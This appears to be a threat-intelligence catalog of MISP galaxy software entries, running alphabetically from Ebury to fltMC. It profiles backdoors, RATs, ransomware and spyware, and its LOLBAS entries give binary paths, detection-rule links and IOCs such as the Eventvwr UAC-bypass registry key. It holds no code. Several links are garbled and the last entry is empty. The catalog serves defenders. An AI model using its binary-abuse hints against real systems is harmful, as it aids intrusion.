[Ebury](https://app.tidalcyber.com/software/2375465a-e6a9-40ab-b631-a5b04cf5c689) is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).<sup>[[ESET Ebury Feb 2014](https://app.tidalcyber.com/references/eb6d4f77-ac63-4cb8-8487-20f9e709334b)]</sup><sup>[[BleepingComputer Ebury March 2017](https://app.tidalcyber.com/references/e5d69297-b0f3-4586-9eb7-d2922b3ee7bb)]</sup><sup>[[ESET Ebury Oct 2017](https://app.tidalcyber.com/references/5257a8ed-1cc8-42f8-86a7-8c0fd0e553a7)]</sup>

The tag is: misp-galaxy:software="Ebury"

ECCENTRICBANDWAGON

[ECCENTRICBANDWAGON](https://app.tidalcyber.com/software/70f703b3-0e24-4ffe-9772-f0e386ec607f) is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool—​with keylogging and screen capture functionality—​used for information gathering on compromised systems.<sup>[[CISA EB Aug 2020](https://app.tidalcyber.com/references/a1b143f9-ca85-4c11-8909-49423c9ffeab)]</sup>

The tag is: misp-galaxy:software="ECCENTRICBANDWAGON"

HEAVYHAND - Associated Software

The tag is: misp-galaxy:software="HEAVYHAND - Associated Software"

SigLoader - Associated Software

The tag is: misp-galaxy:software="SigLoader - Associated Software"

DESLoader - Associated Software

The tag is: misp-galaxy:software="DESLoader - Associated Software"

Egregor

[Egregor](https://app.tidalcyber.com/software/0e36b62f-a6e2-4406-b3d9-e05204e14a66) is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between [Egregor](https://app.tidalcyber.com/software/0e36b62f-a6e2-4406-b3d9-e05204e14a66) and Sekhmet ransomware, as well as [Maze](https://app.tidalcyber.com/software/3c206491-45c0-4ff7-9f40-45f9aae4de64) ransomware.<sup>[[NHS Digital Egregor Nov 2020](https://app.tidalcyber.com/references/92f74037-2a20-4667-820d-2ccc0e4dbd3d)]</sup><sup>[[Cyble Egregor Oct 2020](https://app.tidalcyber.com/references/545a131d-88fc-4b34-923c-0b759b45fc7f)]</sup><sup>[[Security Boulevard Egregor Oct 2020](https://app.tidalcyber.com/references/cd37a000-9e15-45a3-a7c9-bb508c10e55d)]</sup>

The tag is: misp-galaxy:software="Egregor"

SNAKEHOSE - Associated Software

The tag is: misp-galaxy:software="SNAKEHOSE - Associated Software"

EKANS

[EKANS](https://app.tidalcyber.com/software/cd7821cb-32f3-4d81-a5d1-0cdee94a15c4) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://app.tidalcyber.com/software/cd7821cb-32f3-4d81-a5d1-0cdee94a15c4) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex]([Dragos EKANS(https://app.tidalcyber.com/references/c8a018c5-caa3-4af1-b210-b65bbf94c8b2)]</sup><sup>[[Palo Alto Unit 42 EKANS](https://app.tidalcyber.com/references/dcdd4e48-3c3d-4008-a6f6-390f896f147b)]</sup>

The tag is: misp-galaxy:software="EKANS"

Page - Associated Software

The tag is: misp-galaxy:software="Page - Associated Software"

BKDR_ESILE - Associated Software

The tag is: misp-galaxy:software="BKDR_ESILE - Associated Software"

Elise

[Elise](https://app.tidalcyber.com/software/fd5efee9-8710-4536-861f-c88d882f4d24) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://app.tidalcyber.com/groups/2849455a-cf39-4a9f-bd89-c2b3c1e5dd52). It is part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU. <sup>[[Lotus Blossom Jun 2015](https://app.tidalcyber.com/references/46fdb8ca-b14d-43bd-a20f-cae7b26e56c6)]</sup><sup>[[Accenture Dragonfish Jan 2018](https://app.tidalcyber.com/references/f692c6fa-7b3a-4d1d-9002-b1a59f7116f4)]</sup>

The tag is: misp-galaxy:software="Elise"

ELMER

[ELMER](https://app.tidalcyber.com/software/6a3ca97e-6dd6-44e5-a5f0-7225099ab474) is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by [APT16](https://app.tidalcyber.com/groups/06a05175-0812-44f5-a529-30eba07d1762). <sup>[[FireEye EPS Awakens Part 2](https://app.tidalcyber.com/references/7fd58ef5-a0b7-40b6-8771-ca5e87740965)]</sup>

The tag is: misp-galaxy:software="ELMER"

Emissary

[Emissary](https://app.tidalcyber.com/software/fd95d38d-83f9-4b31-8292-ba2b04275b36) is a Trojan that has been used by [Lotus Blossom](https://app.tidalcyber.com/groups/2849455a-cf39-4a9f-bd89-c2b3c1e5dd52). It shares code with [Elise](https://app.tidalcyber.com/software/fd5efee9-8710-4536-861f-c88d882f4d24), with both Trojans being part of a malware group referred to as LStudio. <sup>[[Lotus Blossom Dec 2015](https://app.tidalcyber.com/references/dcbe51a0-6d63-4401-b19e-46cd3c42204c)]</sup>

The tag is: misp-galaxy:software="Emissary"

Geodo - Associated Software

The tag is: misp-galaxy:software="Geodo - Associated Software"

Emotet

[Emotet](https://app.tidalcyber.com/software/c987d255-a351-4736-913f-91e2f28d0654) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) and [IcedID](https://app.tidalcyber.com/software/7f59bb7c-5fa9-497d-9d8e-ba9349fd9433). Emotet first emerged in June 2014 and has been primarily used to target the banking sector. <sup>[[Trend Micro Banking Malware Jan 2019](https://app.tidalcyber.com/references/4fee21e3-1b8f-4e10-b077-b59e2df94633)]</sup>

The tag is: misp-galaxy:software="Emotet"

EmPyre - Associated Software

The tag is: misp-galaxy:software="EmPyre - Associated Software"

PowerShell Empire - Associated Software

The tag is: misp-galaxy:software="PowerShell Empire - Associated Software"

Empire

[Empire](https://app.tidalcyber.com/software/fea655ac-558f-4dd0-867f-9a5553626207) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) for Windows and Python for Linux/macOS. [Empire](https://app.tidalcyber.com/software/fea655ac-558f-4dd0-867f-9a5553626207) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.<sup>[[NCSC Joint Report Public Tools](https://app.tidalcyber.com/references/601d88c5-4789-4fa8-a9ab-abc8137f061c)]</sup><sup>[[Github PowerShell Empire](https://app.tidalcyber.com/references/017ec673-454c-492a-a65b-10d3a20dfdab)]</sup><sup>[[GitHub ATTACK Empire](https://app.tidalcyber.com/references/b3d6bb33-2b23-4c0a-b8fa-e002a5c7edfc)]</sup>

The tag is: misp-galaxy:software="Empire"

EnvyScout

The tag is: misp-galaxy:software="EnvyScout"

Tavdig - Associated Software

The tag is: misp-galaxy:software="Tavdig - Associated Software"

Wipbot - Associated Software

The tag is: misp-galaxy:software="Wipbot - Associated Software"

WorldCupSec - Associated Software

The tag is: misp-galaxy:software="WorldCupSec - Associated Software"

TadjMakhal - Associated Software

The tag is: misp-galaxy:software="TadjMakhal - Associated Software"

esentutl.exe - Associated Software

The tag is: misp-galaxy:software="esentutl.exe - Associated Software"

esentutl

[esentutl](https://app.tidalcyber.com/software/a7589733-6b04-4215-a4e7-4b62cd4610fa) is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.<sup>[[Microsoft Esentutl](https://app.tidalcyber.com/references/08fb9e84-495f-4710-bd1e-417eb8191a10)]</sup>

The tag is: misp-galaxy:software="esentutl"

Eventvwr.exe - Associated Software

<sup>[[Eventvwr.exe - LOLBAS Project](/references/0c09812a-a936-4282-b574-35a00f631857)]</sup>

The tag is: misp-galaxy:software="Eventvwr.exe - Associated Software"

Eventvwr

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Displays Windows Event Logs in a GUI window.

Author: Jacob Gajek

Paths: * C:\Windows\System32\eventvwr.exe * C:\Windows\SysWOW64\eventvwr.exe

Detection: * Sigma: [proc_creation_win_uac_bypass_eventvwr.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml) * Sigma: [registry_set_uac_bypass_eventvwr.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml) * Sigma: [file_event_win_uac_bypass_eventvwr.yml](https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml) * Elastic: [privilege_escalation_uac_bypass_event_viewer.toml](https://github.com/elastic/detection-rules/blob/d31ea6253ea40789b1fc49ade79b7ec92154d12a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml) * Splunk: [eventvwr_uac_bypass.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/eventvwr_uac_bypass.yml) * IOC: eventvwr.exe launching child process other than mmc.exe * IOC: Creation or modification of the registry value HKCU\Software\Classes\mscfile\shell\open\command<sup>[[Eventvwr.exe - LOLBAS Project](/references/0c09812a-a936-4282-b574-35a00f631857)]</sup>

The tag is: misp-galaxy:software="Eventvwr"

EvilBunny

[EvilBunny](https://app.tidalcyber.com/software/300e8176-e7ee-44ef-8d10-dff96502f6c6) is a C++ malware sample observed since 2011 that was designed to be a execution platform for Lua scripts.<sup>[[Cyphort EvilBunny Dec 2014](https://app.tidalcyber.com/references/a0218d0f-3378-4508-9d3c-a7cd3e00a156)]</sup>

The tag is: misp-galaxy:software="EvilBunny"

EvilGinx

EvilGinx is an open-source software project. According to its GitHub repository, EvilGinx is a "Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication".<sup>[[GitHub evilginx2](/references/eea178f4-80bd-49d1-84b1-f80671e9a3e4)]</sup>

The tag is: misp-galaxy:software="EvilGinx"

EvilGrab

[EvilGrab](https://app.tidalcyber.com/software/e862419c-d6b6-4433-a02a-c1cc98ea6f9e) is a malware family with common reconnaissance capabilities. It has been deployed by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) via malicious Microsoft Office documents as part of spearphishing campaigns. <sup>[[PWC Cloud Hopper Technical Annex April 2017](https://app.tidalcyber.com/references/da6c8a72-c732-44d5-81ac-427898706eed)]</sup>

The tag is: misp-galaxy:software="EvilGrab"

EVILNUM

The tag is: misp-galaxy:software="EVILNUM"

Exaramel for Linux

[Exaramel for Linux](https://app.tidalcyber.com/software/c773f709-b5fe-4514-9d88-24ceb0dd8063) is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under [Exaramel for Windows]([ESET TeleBots Oct 2018(https://app.tidalcyber.com/references/56372448-03f5-49b5-a2a9-384fbd49fefc)]</sup>

The tag is: misp-galaxy:software="Exaramel for Linux"

Exaramel for Windows

[Exaramel for Windows](https://app.tidalcyber.com/software/21569dfb-c9f1-468e-903e-348f19dbae1f) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux]([ESET TeleBots Oct 2018(https://app.tidalcyber.com/references/56372448-03f5-49b5-a2a9-384fbd49fefc)]</sup>

The tag is: misp-galaxy:software="Exaramel for Windows"

Excel.exe - Associated Software

<sup>[[Excel.exe - LOLBAS Project](/references/9a2458f7-63ca-4eca-8c61-b6098ec0798f)]</sup>

The tag is: misp-galaxy:software="Excel.exe - Associated Software"

Excel

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Office binary

Author: Reegun J (OCBC Bank)

Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe * C:\Program Files\Microsoft Office\Office16\Excel.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe * C:\Program Files\Microsoft Office\Office15\Excel.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe * C:\Program Files\Microsoft Office\Office14\Excel.exe * C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe * C:\Program Files\Microsoft Office\Office12\Excel.exe * C:\Program Files\Microsoft Office\Office12\Excel.exe

Detection: * Sigma: [proc_creation_win_lolbin_office.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml) * IOC: Suspicious Office application Internet/network traffic<sup>[[Excel.exe - LOLBAS Project](/references/9a2458f7-63ca-4eca-8c61-b6098ec0798f)]</sup>

The tag is: misp-galaxy:software="Excel"

ExMatter

ExMatter is a custom data exfiltration tool. It was first observed in November 2021 during intrusions involving BlackMatter ransomware, and more recently has been used during BlackCat ransomware attacks. In August 2022, researchers observed a “heavily updated” version of ExMatter, which featured expanded protocols for exfiltrating data, a data corruption capability, enhanced defense evasion abilities, and a narrower range of targeted file types.<sup>[[Symantec Noberus September 22 2022](/references/afd6808d-2c9f-4926-b7c6-ca9d3abdd923)]</sup>

The tag is: misp-galaxy:software="ExMatter"

Expand.exe - Associated Software

The tag is: misp-galaxy:software="Expand.exe - Associated Software"

Expand

[Expand](https://app.tidalcyber.com/software/5d7a39e3-c667-45b3-987e-3b0ca49cff61) is a Windows utility used to expand one or more compressed CAB files.<sup>[[Microsoft Expand Utility](https://app.tidalcyber.com/references/bf73a375-87b7-4603-8734-9f3d8d11967e)]</sup> It has been used by [BBSRAT](https://app.tidalcyber.com/software/be4dab36-d499-4ac3-b204-5e309e3a5331) to decompress a CAB file into executable content.<sup>[[Palo Alto Networks BBSRAT](https://app.tidalcyber.com/references/8c5d61ba-24c5-4f6c-a208-e0a5d23ebb49)]</sup>

The tag is: misp-galaxy:software="Expand"

Explorer.exe - Associated Software

<sup>[[Explorer.exe - LOLBAS Project](/references/9ba3d54c-02d1-45bd-bfe8-939e84d9d44b)]</sup>

The tag is: misp-galaxy:software="Explorer.exe - Associated Software"

Explorer

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary used for managing files and system components within Windows

Author: Jai Minton

Paths: * C:\Windows\explorer.exe * C:\Windows\SysWOW64\explorer.exe

Detection: * Sigma: [proc_creation_win_explorer_break_process_tree.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml) * Sigma: [proc_creation_win_explorer_lolbin_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml) * Elastic: [initial_access_via_explorer_suspicious_child_parent_args.toml](https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml) * IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line is suspicious.<sup>[[Explorer.exe - LOLBAS Project](/references/9ba3d54c-02d1-45bd-bfe8-939e84d9d44b)]</sup>

The tag is: misp-galaxy:software="Explorer"

Explosive

[Explosive](https://app.tidalcyber.com/software/572eec55-2855-49ac-a82e-2c21e9aca27e) is a custom-made remote access tool used by the group [Volatile Cedar](https://app.tidalcyber.com/groups/7c3ef21c-0e1c-43d5-afb0-3a07c5a66937). It was first identified in the wild in 2015.<sup>[[CheckPoint Volatile Cedar March 2015](https://app.tidalcyber.com/references/a26344a2-63ca-422e-8cf9-0cf22a5bee72)]</sup><sup>[[ClearSky Lebanese Cedar Jan 2021](https://app.tidalcyber.com/references/53944d48-caa9-4912-b42d-94a3789ed15b)]</sup>

The tag is: misp-galaxy:software="Explosive"

Extexport.exe - Associated Software

<sup>[[Extexport.exe - LOLBAS Project](/references/2aa09a10-a492-4753-bbd8-aacd31e4fee3)]</sup>

The tag is: misp-galaxy:software="Extexport.exe - Associated Software"

Extexport

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Load a DLL located in the c:\test folder with a specific name.

Author: Oddvar Moe

Paths: * C:\Program Files\Internet Explorer\Extexport.exe * C:\Program Files (x86)\Internet Explorer\Extexport.exe

Detection: * Sigma: [proc_creation_win_lolbin_extexport.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml) * IOC: Extexport.exe loads dll and is execute from other folder the original path<sup>[[Extexport.exe - LOLBAS Project](/references/2aa09a10-a492-4753-bbd8-aacd31e4fee3)]</sup>

The tag is: misp-galaxy:software="Extexport"

ExtPassword

ExtPassword is a tool used to recover passwords from Windows systems.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="ExtPassword"

Extrac32.exe - Associated Software

<sup>[[Extrac32.exe - LOLBAS Project](/references/ae632afc-336c-488e-81f6-91ffe1829595)]</sup>

The tag is: misp-galaxy:software="Extrac32.exe - Associated Software"

Extrac32

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Extract to ADS, copy or overwrite a file with Extrac32.exe

Author: Oddvar Moe

Paths: * C:\Windows\System32\extrac32.exe * C:\Windows\SysWOW64\extrac32.exe

Detection: * Elastic: [defense_evasion_misc_lolbin_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml) * Sigma: [proc_creation_win_lolbin_extrac32.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml) * Sigma: [proc_creation_win_lolbin_extrac32_ads.yml]([Extrac32.exe - LOLBAS Project(/references/ae632afc-336c-488e-81f6-91ffe1829595)]</sup>

The tag is: misp-galaxy:software="Extrac32"

FakeM

The tag is: misp-galaxy:software="FakeM"

FALLCHILL

[FALLCHILL](https://app.tidalcyber.com/software/ea47f1fd-0171-4254-8c92-92b7a5eec5e1) is a RAT that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) malware or delivered when a victim unknowingly visits a compromised website. <sup>[[US-CERT FALLCHILL Nov 2017](https://app.tidalcyber.com/references/045e03f9-af83-4442-b69e-b80f68e570ac)]</sup>

The tag is: misp-galaxy:software="FALLCHILL"

FatDuke

The tag is: misp-galaxy:software="FatDuke"

Felismus

The tag is: misp-galaxy:software="Felismus"

GreyEnergy mini - Associated Software

The tag is: misp-galaxy:software="GreyEnergy mini - Associated Software"

FELIXROOT

[FELIXROOT](https://app.tidalcyber.com/software/4b1a07cd-4c1f-4d93-a454-07fd59b3039a) is a backdoor that has been used to target Ukrainian victims. <sup>[[FireEye FELIXROOT July 2018](https://app.tidalcyber.com/references/501057e2-9a31-46fe-aaa0-427218682153)]</sup>

The tag is: misp-galaxy:software="FELIXROOT"

Ferocious

[Ferocious](https://app.tidalcyber.com/software/3e54ba7a-fd4c-477f-9c2d-34b4f69fc091) is a first stage implant composed of VBS and PowerShell scripts that has been used by [WIRTE](https://app.tidalcyber.com/groups/73da066d-b25f-45ba-862b-1a69228c6baa) since at least 2021.<sup>[[Kaspersky WIRTE November 2021](https://app.tidalcyber.com/references/143b4694-024d-49a5-be3c-d9ceca7295b2)]</sup>

The tag is: misp-galaxy:software="Ferocious"

Fgdump

The tag is: misp-galaxy:software="Fgdump"

FileZilla

FileZilla is a tool used to perform cross-platform File Transfer Protocol (FTP) to a site, server, or host.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="FileZilla"

Final1stspy

The tag is: misp-galaxy:software="Final1stspy"

Findstr.exe - Associated Software

<sup>[[Findstr.exe - LOLBAS Project](/references/fc4b7b28-ac74-4a8f-a39d-ce55df5fca08)]</sup>

The tag is: misp-galaxy:software="Findstr.exe - Associated Software"

Findstr

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Write to ADS, discover, or download files with Findstr.exe

Author: Oddvar Moe

Paths: * C:\Windows\System32\findstr.exe * C:\Windows\SysWOW64\findstr.exe

Detection: * Sigma: [proc_creation_win_lolbin_findstr.yml]([Findstr.exe - LOLBAS Project(/references/fc4b7b28-ac74-4a8f-a39d-ce55df5fca08)]</sup>

The tag is: misp-galaxy:software="Findstr"

FinSpy - Associated Software

The tag is: misp-galaxy:software="FinSpy - Associated Software"

FinFisher

[FinFisher](https://app.tidalcyber.com/software/41f54ce1-842c-428a-977f-518a5b63b4d7) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://app.tidalcyber.com/software/3e70078f-407e-4b03-b604-bdc05b372f37). <sup>[[FinFisher Citation](https://app.tidalcyber.com/references/6ef0b8d8-ba98-49ce-807d-5a85d111b027)]</sup> <sup>[[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)]</sup> <sup>[[FireEye FinSpy Sept 2017](https://app.tidalcyber.com/references/142cf7a3-2ca2-4cf3-b95a-9f4b3bc1cdce)]</sup> <sup>[[Securelist BlackOasis Oct 2017](https://app.tidalcyber.com/references/66121c37-6b66-4ab2-9f63-1adb80dcec62)]</sup> <sup>[[Microsoft FinFisher March 2018](https://app.tidalcyber.com/references/88c97a9a-ef14-4695-bde0-9de2b5f5343b)]</sup>

The tag is: misp-galaxy:software="FinFisher"

Finger.exe - Associated Software

<sup>[[Finger.exe - LOLBAS Project](/references/e32d01eb-d904-43dc-a7e2-bdcf42f3ebb2)]</sup>

The tag is: misp-galaxy:software="Finger.exe - Associated Software"

Finger

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon

Author: Ruben Revuelta

Paths: * c:\windows\system32\finger.exe * c:\windows\syswow64\finger.exe

Detection: * Sigma: [proc_creation_win_finger_usage.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_finger_usage.yml) * IOC: finger.exe should not be run on a normal workstation. * IOC: finger.exe connecting to external resources.<sup>[[Finger.exe - LOLBAS Project](/references/e32d01eb-d904-43dc-a7e2-bdcf42f3ebb2)]</sup>

The tag is: misp-galaxy:software="Finger"

FIVEHANDS

[FIVEHANDS](https://app.tidalcyber.com/software/84187393-2fe9-4136-8720-a6893734ee8c) is a customized version of [DEATHRANSOM](https://app.tidalcyber.com/software/832f5ab1-1267-40c9-84ef-f32d6373be4e) ransomware written in C++. [FIVEHANDS](https://app.tidalcyber.com/software/84187393-2fe9-4136-8720-a6893734ee8c) has been used since at least 2021, including in Ransomware-as-a-Service (RaaS) campaigns, sometimes along with [SombRAT]([FireEye FiveHands April 2021(https://app.tidalcyber.com/references/832aeb46-b248-43e8-9157-a2f56bcd1806)]</sup><sup>[[NCC Group Fivehands June 2021](https://app.tidalcyber.com/references/33955c35-e8cd-4486-b1ab-6f992319c81c)]</sup>

The tag is: misp-galaxy:software="FIVEHANDS"

Flagpro

[Flagpro](https://app.tidalcyber.com/software/977aaf8a-2216-40f0-8682-61dd91638147) is a Windows-based, first-stage downloader that has been used by [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.<sup>[[NTT Security Flagpro new December 2021](https://app.tidalcyber.com/references/c0f523fa-7f3b-4c85-b48f-19ae770e9f3b)]</sup>

The tag is: misp-galaxy:software="Flagpro"

Flamer - Associated Software

The tag is: misp-galaxy:software="Flamer - Associated Software"

sKyWIper - Associated Software

The tag is: misp-galaxy:software="sKyWIper - Associated Software"

Flame

[Flame](https://app.tidalcyber.com/software/87604333-638f-4f4a-94e0-16aa825dd5b8) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. <sup>[[Kaspersky Flame](https://app.tidalcyber.com/references/6db8f76d-fe38-43b1-ad85-ad372da9c09d)]</sup>

The tag is: misp-galaxy:software="Flame"

FLASHFLOOD

[FLASHFLOOD](https://app.tidalcyber.com/software/44a5e62a-6de4-49d2-8f1b-e68ecdf9f332) is malware developed by [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) that allows propagation and exfiltration of data over removable devices. [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) may use this capability to exfiltrate data across air-gaps. <sup>[[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]</sup>

The tag is: misp-galaxy:software="FLASHFLOOD"

FlawedAmmyy

[FlawedAmmyy](https://app.tidalcyber.com/software/308dbe77-3d58-40bb-b0a5-cd00f152dc60) is a remote access tool (RAT) that was first seen in early 2016. The code for [FlawedAmmyy](https://app.tidalcyber.com/software/308dbe77-3d58-40bb-b0a5-cd00f152dc60) was based on leaked source code for a version of Ammyy Admin, a remote access software.<sup>[[Proofpoint TA505 Mar 2018](https://app.tidalcyber.com/references/44e48c77-59dd-4851-8455-893513b7cf45)]</sup>

The tag is: misp-galaxy:software="FlawedAmmyy"

BARBWIRE - Associated Software

<sup>[[The DFIR Report Truebot June 12 2023](/references/a6311a66-bb36-4cad-a98f-2b0b89aafa3d)]</sup>

The tag is: misp-galaxy:software="BARBWIRE - Associated Software"

GraceWire - Associated Software

<sup>[[The DFIR Report Truebot June 12 2023](/references/a6311a66-bb36-4cad-a98f-2b0b89aafa3d)]</sup>

The tag is: misp-galaxy:software="GraceWire - Associated Software"

FlawedGrace

[FlawedGrace](https://app.tidalcyber.com/software/c558e948-c817-4494-a95d-ad3207f10e26) is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.<sup>[[Proofpoint TA505 Jan 2019](https://app.tidalcyber.com/references/b744f739-8810-4fb9-96e3-6488f9ed6305)]</sup>

The tag is: misp-galaxy:software="FlawedGrace"

Commander - Associated Software

The tag is: misp-galaxy:software="Commander - Associated Software"

FleetDeck

FleetDeck is a commercial remote monitoring and management (RMM) tool that enables remote desktop access and “virtual terminal” capabilities. Government and commercial reports indicate that financially motivated adversaries, including BlackCat (AKA ALPHV or Noberus) actors and Scattered Spider (AKA 0ktapus or UNC3944), have used FleetDeck for command and control and persistence purposes during intrusions.<sup>[[Cyber Centre ALPHV/BlackCat July 25 2023](/references/610c8f22-1a96-42d2-934d-8467d136eed2)]</sup><sup>[[CrowdStrike Scattered Spider SIM Swapping December 22 2022](/references/e48760ba-2752-4d30-8f99-152c81f63017)]</sup>

The tag is: misp-galaxy:software="FleetDeck"

FLIPSIDE

[FLIPSIDE](https://app.tidalcyber.com/software/18002747-ddcc-42c1-b0ca-1e598a9f1919) is a simple tool similar to Plink that is used by [FIN5](https://app.tidalcyber.com/groups/7902f5cc-d6a5-4a57-8d54-4c75e0c58b83) to maintain access to victims. <sup>[[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)]</sup>

The tag is: misp-galaxy:software="FLIPSIDE"

fltMC.exe - Associated Software

<sup>[[fltMC.exe - LOLBAS Project](/references/cf9b4bd3-92f0-405b-85e7-95e65d548b79)]</sup>

The tag is: misp-galaxy:software="fltMC.exe - Associated Software"

fltMC

